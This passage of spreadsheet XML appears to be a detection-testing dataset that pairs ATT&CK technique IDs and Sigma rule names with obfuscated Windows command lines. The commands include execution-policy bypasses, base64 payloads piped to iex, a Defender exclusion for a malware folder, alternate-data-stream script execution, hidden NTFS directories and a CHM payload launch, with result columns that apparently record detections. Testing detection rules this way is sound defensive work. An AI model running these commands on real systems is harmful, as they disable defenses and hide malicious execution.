          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F492" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G492" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H492" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I492" s="36" t="n"/>
      <c r="J492" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K492" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B493" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C493" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D493" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E493" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F493" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G493" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H493" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I493" s="43" t="n"/>
      <c r="J493" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K493" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B494" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C494" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D494" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E494" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F494" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G494" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H494" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K494" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B495" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C495" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D495" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E495" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F495" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G495" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H495" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K495" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B496" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C496" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D496" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E496" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F496" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G496" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="43" t="n"/>
      <c r="J496" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K496" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="43" t="n"/>
      <c r="B497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C497" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D497" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E497" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="43" t="n"/>
      <c r="J497" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="36" t="n"/>
      <c r="B498" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C498" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D498" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E498" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F498" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G498" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H498" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I498" s="43" t="n"/>
      <c r="J498" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K498" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="36" t="n"/>
      <c r="B499" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C499" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D499" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E499" s="36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499" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G499" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H499" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K499" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="36" t="n"/>
      <c r="B500" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C500" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D500" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E500" s="36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500" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G500" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="43" t="n"/>
      <c r="J500" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K500" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="36" t="n"/>
      <c r="B501" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C501" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D501" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E501" s="36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F501" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G501" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H501" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I501" s="36" t="n"/>
      <c r="J501" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K501" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="36" t="n"/>
      <c r="B502" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C502" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D502" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E502" s="36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F502" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G502" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H502" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I502" s="36" t="n"/>
      <c r="J502" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K502" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="36" t="n"/>
      <c r="B503" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C503" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D503" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E503" s="36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F503" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G503" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H503" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="36" t="n"/>
      <c r="J503" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K503" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="43" t="n"/>
      <c r="B504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C504" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D504" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E504" s="43" t="inlineStr">
        <is>
          <t>$o = New-Object IO.MemoryStream; $data = [System.Convert]::FromBase64String('...'); iex ([System.Text.Encoding]::ASCII.GetString($data))</t>
        </is>
      </c>
      <c r="F504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I504" s="43" t="n"/>
      <c r="J504" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K504" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="43" t="n"/>
      <c r="B505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C505" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D505" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E505" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I505" s="43" t="n"/>
      <c r="J505" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="43" t="n"/>
      <c r="B506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C506" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D506" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E506" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -W H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I506" s="43" t="n"/>
      <c r="J506" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="43" t="n"/>
      <c r="B507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C507" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D507" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E507" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop /"W" H -st $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I507" s="43" t="n"/>
      <c r="J507" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="43" t="n"/>
      <c r="B508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C508" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D508" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E508" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -nopROFiLe /"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I508" s="43" t="n"/>
      <c r="J508" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="43" t="n"/>
      <c r="B509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C509" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D509" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E509" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -NOprofilE /"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I509" s="43" t="n"/>
      <c r="J509" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K509" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="43" t="n"/>
      <c r="B510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C510" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D510" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E510" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -nop -w H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I510" s="43" t="n"/>
      <c r="J510" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="43" t="n"/>
      <c r="B511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C511" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D511" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E511" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUtiOnpOLIcy Bypass -nop -w H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I511" s="43" t="n"/>
      <c r="J511" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="43" t="n"/>
      <c r="B512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C512" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D512" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E512" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTioNPOLICy Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I512" s="43" t="n"/>
      <c r="J512" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="43" t="n"/>
      <c r="B513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C513" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D513" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E513" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -W H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="43" t="n"/>
      <c r="J513" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C514" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D514" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E514" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream  'streamcommand'
Invoke-Expression $streamcommand}</t>
        </is>
      </c>
      <c r="F514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I514" s="43" t="n"/>
      <c r="J514" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C515" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D515" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E515" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = &amp; 'Get-Content' -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand}</t>
        </is>
      </c>
      <c r="F515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I515" s="43" t="n"/>
      <c r="J515" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C516" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D516" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E516" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Str 'streamcommand'
Invoke-Expression $streamcommand}</t>
        </is>
      </c>
      <c r="F516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I516" s="43" t="n"/>
      <c r="J516" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C517" s="43" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D517" s="43" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E517" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c md %temp%\...$.......::i^n^d^e^x_^a^l^l^o^c^a^t^i^o^n &amp; echo too many secrets &gt; %temp%\...$.......::i^n^d^e^x_^a^l^l^o^c^a^t^i^o^n\secrets.txt</t>
        </is>
      </c>
      <c r="F517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I517" s="43" t="n"/>
      <c r="J517" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C518" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D518" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E518" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I518" s="43" t="n"/>
      <c r="J518" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C519" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D519" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E519" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I519" s="43" t="n"/>
      <c r="J519" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C520" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D520" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E520" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H520" s="43" t="b">
        <v>0</v>
      </c>
